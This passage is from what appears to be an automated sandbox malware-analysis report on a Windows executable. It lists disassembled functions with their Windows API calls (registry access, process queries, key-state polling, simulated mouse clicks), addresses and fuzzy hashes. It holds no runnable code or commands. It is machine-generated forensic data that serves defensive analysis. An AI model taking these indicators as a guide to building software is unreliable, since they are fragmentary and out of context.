                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                    • String ID: %lu
                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                    • Opcode ID: 6b2904aba03c25e732018ae0a38278df99a8b94cf2bb2738afff110971ad85f3
                                                                                                                    • Instruction ID: 2b49c0610cc09088b96c15f67c4c1fed5bd22eb2551250e6f35201db3e626ae7
                                                                                                                    • Opcode Fuzzy Hash: 6b2904aba03c25e732018ae0a38278df99a8b94cf2bb2738afff110971ad85f3
                                                                                                                    • Instruction Fuzzy Hash: D2217131A00209AFCB11EFA5D945EEE7BB8EF49714F0040A9F909DB251DB71EA41CB61
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0037FCED,?,00380D40,?,00008000), ref: 0038115F
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0037FCED,?,00380D40,?,00008000), ref: 00381184
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0037FCED,?,00380D40,?,00008000), ref: 0038118E
                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0037FCED,?,00380D40,?,00008000), ref: 003811C1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID: @8
                                                                                                                    • API String ID: 2875609808-309826049
                                                                                                                    • Opcode ID: a2a138ea279da74df9034bca7f3c4de4145d50363872103b72dbf5704e6a0943
                                                                                                                    • Instruction ID: c792703ace2ea38896488277938edb59feecc6f89b56c1529ec32a0634c6e30b
                                                                                                                    • Opcode Fuzzy Hash: a2a138ea279da74df9034bca7f3c4de4145d50363872103b72dbf5704e6a0943
                                                                                                                    • Instruction Fuzzy Hash: EE113C31D0061DDBCF02AFE5D849AEEBBBCFF0A711F014096EA85B6240CB709552CB95
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00381B19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
• Opcode ID: 325dfdb5d1ff99d527f5b83c44ac8dabba9dbd1ab5f19968da107500a51a8c7c
• Instruction ID: c1ccaf6b75b37b656713ad706f2c96e6021ca3422d4c22392b317502bbb97df3
• Opcode Fuzzy Hash: 325dfdb5d1ff99d527f5b83c44ac8dabba9dbd1ab5f19968da107500a51a8c7c
• Instruction Fuzzy Hash: B01161759502189FCF06EFA4E8518FEB7B9FF26304F1044A5D814AB791EB326D06CB50
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0039EC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0039EC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0039ED6A
• CloseHandle.KERNEL32(?), ref: 0039EDEB
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: 96ff5baf3ee6aef8a18d4b7a7f9daf0983fd77a70be4022fc0fa47753ffd985b
• Instruction ID: 760a34332d3b821247611b80ee8e1e888e98cb6bd0d0aca1e8231b6575e40bf9
• Opcode Fuzzy Hash: 96ff5baf3ee6aef8a18d4b7a7f9daf0983fd77a70be4022fc0fa47753ffd985b
• Instruction Fuzzy Hash: B0817271604710AFDB22EF28D886F2AB7E5AF48710F44881DF999DB2D2D7B0AC40CB51
APIs
  • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
  • Part of subcall function 003A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039FDAD,?,?), ref: 003A0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A00FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003A0183
• RegCloseKey.ADVAPI32(?,?), ref: 003A01AF
• RegCloseKey.ADVAPI32(00000000), ref: 003A01BC
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: f20bdd448f4557f6e8445fe225aabf46a772335b3522d2c784bda559a5a510fc
• Instruction ID: e857101e2999bc85aad276143d509d187caf64a45f553a868aea265497a1358a
• Opcode Fuzzy Hash: f20bdd448f4557f6e8445fe225aabf46a772335b3522d2c784bda559a5a510fc
• Instruction Fuzzy Hash: F2519E71208204AFD71AEF54DC81FAAB7E8FF85314F40492DF5958B2A2DB31E944CB52
APIs
  • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
  • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0039D927
• GetProcAddress.KERNEL32(00000000,?), ref: 0039D9AA
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0039D9C6
• GetProcAddress.KERNEL32(00000000,?), ref: 0039DA07
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0039DA21
  • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00387896,?,?,00000000), ref: 00325A2C
  • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00387896,?,?,00000000,?,?), ref: 00325A50
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: af3def2d8d81bd6bd0434d655479207559f90958a09017f965e9d249a9ca6176
• Instruction ID: 5c0c8dd8be3ba134faf73b1939a6e74c8253a433889218f694ca47adc9251d1d
• Opcode Fuzzy Hash: af3def2d8d81bd6bd0434d655479207559f90958a09017f965e9d249a9ca6176
• Instruction Fuzzy Hash: 00512635A00219DFCB02EFA8D4859ADB7B8FF19320F058065E859AB312D730EE45CF90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0038E61F
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0038E648
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0038E687
  • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
  • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0038E6AC
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0038E6B4
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 6777a454de7a0c37c5c3075c42d7aed11d8e9a65965adff8f2d4d283edd660da
• Instruction ID: 54354342b00896c3a96bb77813f0254d20421655b5c28580d8c8bf4fefe04430
• Opcode Fuzzy Hash: 6777a454de7a0c37c5c3075c42d7aed11d8e9a65965adff8f2d4d283edd660da
• Instruction Fuzzy Hash: 1A510A35A00215DFCB06EF64D981AADBBF5EF09314F1484A9E809AF361DB31ED51DB50
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c9fa9c035b47f6c892b1cf74e253699dae828b1bfa1512a21f95a63bee29a5c
• Instruction ID: 7227582685858e91948dbd6e2144e0066e29d949ac55ec43fff9d7370e09461b
• Opcode Fuzzy Hash: 0c9fa9c035b47f6c892b1cf74e253699dae828b1bfa1512a21f95a63bee29a5c
• Instruction Fuzzy Hash: 9841D636904914BFD722DF78CC88FB9BBA8EB0B310F160265F816A72E1C730AD41DA51
APIs
• GetCursorPos.USER32(?), ref: 00322357
• ScreenToClient.USER32(003E57B0,?), ref: 00322374
• GetAsyncKeyState.USER32(00000001), ref: 00322399
• GetAsyncKeyState.USER32(00000002), ref: 003223A7
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 12484a67f4882fb90d2d2f2049761de8c9a7b22b49b031dac69504a566fe9fd4
• Instruction ID: d133a937cc4b96cbd811f7d05f9e4aae31c91c32106bfb0c13185545727013b4
• Opcode Fuzzy Hash: 12484a67f4882fb90d2d2f2049761de8c9a7b22b49b031dac69504a566fe9fd4
• Instruction Fuzzy Hash: 16416039604215FFCF16DF68CC44EEABBB8FB06365F204319F929962A0C7349954DB91
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003763E7
• TranslateAcceleratorW.USER32(?,?,?), ref: 00376433
• TranslateMessage.USER32(?), ref: 0037645C
• DispatchMessageW.USER32(?), ref: 00376466
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00376475
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
• Opcode ID: bcad81cf4d03155c4a0e8880b17b086e74116980a4a91fbaa92f2905b80742a8
• Instruction ID: 97dc05b1f372b6b6923682795d763a0cb0e124e7f5305fa3d06c2a073909bb6b
• Opcode Fuzzy Hash: bcad81cf4d03155c4a0e8880b17b086e74116980a4a91fbaa92f2905b80742a8
• Instruction Fuzzy Hash: 4531E731A00A42AFDB37CFB1CC96BF67BECAB01304F158269E529D60B1E7399845DB50
APIs
• GetWindowRect.USER32(?,?), ref: 00378A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00378ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00378AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00378AF0
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00378AF8
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    • Opcode ID: 885e04951e1c2aa86ef7d0af15fa2ad815645db30849f953892ce0c71ef04258
                                                                                                                    • Instruction ID: f32365d17bea19317cabf10485103cc8a5af046066561c0701157b2adfe93bf5
                                                                                                                    • Opcode Fuzzy Hash: 885e04951e1c2aa86ef7d0af15fa2ad815645db30849f953892ce0c71ef04258
                                                                                                                    • Instruction Fuzzy Hash: B631C071500219EFDF25CFA8D98CA9E7BB9EB05315F10822AF929EA1D0C7B49914DB90
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 0037B204
                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0037B221
                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0037B259
                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0037B27F
                                                                                                                    • _wcsstr.LIBCMT ref: 0037B289
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902887630-0
                                                                                                                    • Opcode ID: 59fa890d077c7e4a91df42a11a569482211902e25a7d81793c8b8619fd230fed
                                                                                                                    • Instruction ID: 3e1ca374a2a150ff5904213782f822dd37392bd74d06317eabf171b2b7269094
                                                                                                                    • Opcode Fuzzy Hash: 59fa890d077c7e4a91df42a11a569482211902e25a7d81793c8b8619fd230fed
                                                                                                                    • Instruction Fuzzy Hash: EF21F531605200BBEB275B759C49F7FBBACDF4A710F018129F808DE162EF65DC4096A0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AB192
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003AB1B7
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003AB1CF
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 003AB1F8
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00390E90,00000000), ref: 003AB216
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2294984445-0
                                                                                                                    • Opcode ID: e3518b1376b268baaf7517522c14993b11ef3ee2d86581f1bc73d0e82789db4b
                                                                                                                    • Instruction ID: abaf93030363a1de3a5ad4a17bc6a791d0a36d09ffc748f9b20aa0f280624c5a
                                                                                                                    • Opcode Fuzzy Hash: e3518b1376b268baaf7517522c14993b11ef3ee2d86581f1bc73d0e82789db4b
                                                                                                                    • Instruction Fuzzy Hash: 35219471A10261AFCB229F789C54B6A77A8FB07361F114B35F932D71E1E73098609B90
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00379320
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00379352
                                                                                                                    • __itow.LIBCMT ref: 0037936A
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00379392
                                                                                                                    • __itow.LIBCMT ref: 003793A3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2983881199-0
                                                                                                                    • Opcode ID: 6779b8df5d1b559e7f605a3029d1d83ba4c866c22a24b3d3666ed86129e21ef3
                                                                                                                    • Instruction ID: 2a38ac7e86e470ef6fa434fcd6db04696b91667b9f66f1796ac2649dc13ba618
                                                                                                                    • Opcode Fuzzy Hash: 6779b8df5d1b559e7f605a3029d1d83ba4c866c22a24b3d3666ed86129e21ef3
                                                                                                                    • Instruction Fuzzy Hash: 0A210A35700214AFEB229E609C85FEE3BACEB49710F04802AFD08EB2D0D674CD418791
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00000000), ref: 00395A6E
                                                                                                                    • GetForegroundWindow.USER32 ref: 00395A85
                                                                                                                    • GetDC.USER32(00000000), ref: 00395AC1
                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00395ACD
                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00395B08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4156661090-0
                                                                                                                    • Opcode ID: 7a061868d35f8256e14d6b71f5e462d846011e3295fa855bcf1ad78cfb98efb1
                                                                                                                    • Instruction ID: 268c8a3e4ec17e5c84d402f6377e90e2c7ea7dc53b8d92c837d0de3b842ab597
                                                                                                                    • Opcode Fuzzy Hash: 7a061868d35f8256e14d6b71f5e462d846011e3295fa855bcf1ad78cfb98efb1
                                                                                                                    • Instruction Fuzzy Hash: 8921A135A00204AFDB16EFA5DC84A9ABBF9EF49310F148079F809D7362CA70EC40CB90
                                                                                                                    APIs
                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0032134D
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0032135C
                                                                                                                    • BeginPath.GDI32(?), ref: 00321373
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0032139C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 8752399d7926adc58cabe7bce5e5ee2791d18feb90d478c3666b169a5a73e2e6
                                                                                                                    • Instruction ID: 23ef6379acab8aa38940fea926215c031632152ab76b2a39246fe050c04922d0
                                                                                                                    • Opcode Fuzzy Hash: 8752399d7926adc58cabe7bce5e5ee2791d18feb90d478c3666b169a5a73e2e6
                                                                                                                    • Instruction Fuzzy Hash: 86218C30900668EFDB23CF65ED847697BADFB10729F154326E9109A5F0D3B09891DF90
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00384ABA
                                                                                                                    • __beginthreadex.LIBCMT ref: 00384AD8
                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00384AED
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00384B03
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00384B0A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3824534824-0
                                                                                                                    • Opcode ID: a94612f80b903d309d5a824418bcf561600450b7ea1cf719cf18861a9d1ed426
                                                                                                                    • Instruction ID: e8cf282c046b923568878463d1e1789fcc3c8e8640e8b6dada4e695241803f15
                                                                                                                    • Opcode Fuzzy Hash: a94612f80b903d309d5a824418bcf561600450b7ea1cf719cf18861a9d1ed426
                                                                                                                    • Instruction Fuzzy Hash: DF110476905359BFCB139FA8AC48A9B7FACEB45324F1443A9F914D7290D675C90087E0
                                                                                                                    APIs
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0037821E
                                                                                                                    • GetLastError.KERNEL32(?,00377CE2,?,?,?), ref: 00378228
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00377CE2,?,?,?), ref: 00378237
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00377CE2,?,?,?), ref: 0037823E
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00378255
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842720411-0
                                                                                                                    • Opcode ID: fc9f334bc76eec5b9c15ab504cc84dd85e1d8b20f8b88a56f6dc699b8eb6a693
                                                                                                                    • Instruction ID: 11fc92601d912b40c830be691e7754c622d34bcc1e71ede9dc70b8657b803a39
                                                                                                                    • Opcode Fuzzy Hash: fc9f334bc76eec5b9c15ab504cc84dd85e1d8b20f8b88a56f6dc699b8eb6a693
                                                                                                                    • Instruction Fuzzy Hash: 98016971381604BFDB224FA6DC4CD6B7BACEF8A756B504869F809C2260DA318C00CA60
                                                                                                                    APIs
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?,?,00377455), ref: 00377127
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 00377142
                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 00377150
                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?), ref: 00377160
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 0037716C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: 73cede099e3911ba40fd847b0c2d12ef35d768d286bb57c2650810792232dcf0
                                                                                                                    • Instruction ID: c13911243ecd6e3a384a1a28d1bf316d372beaf723c54c3e9fb23b176d64e286
                                                                                                                    • Opcode Fuzzy Hash: 73cede099e3911ba40fd847b0c2d12ef35d768d286bb57c2650810792232dcf0
                                                                                                                    • Instruction Fuzzy Hash: A0018F76601204BFDB224FA4DC44BAA7BADEF45791F158178FD0CD2220DB79DD409BA0
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00385260
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0038526E
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00385276
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00385280
                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003852BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
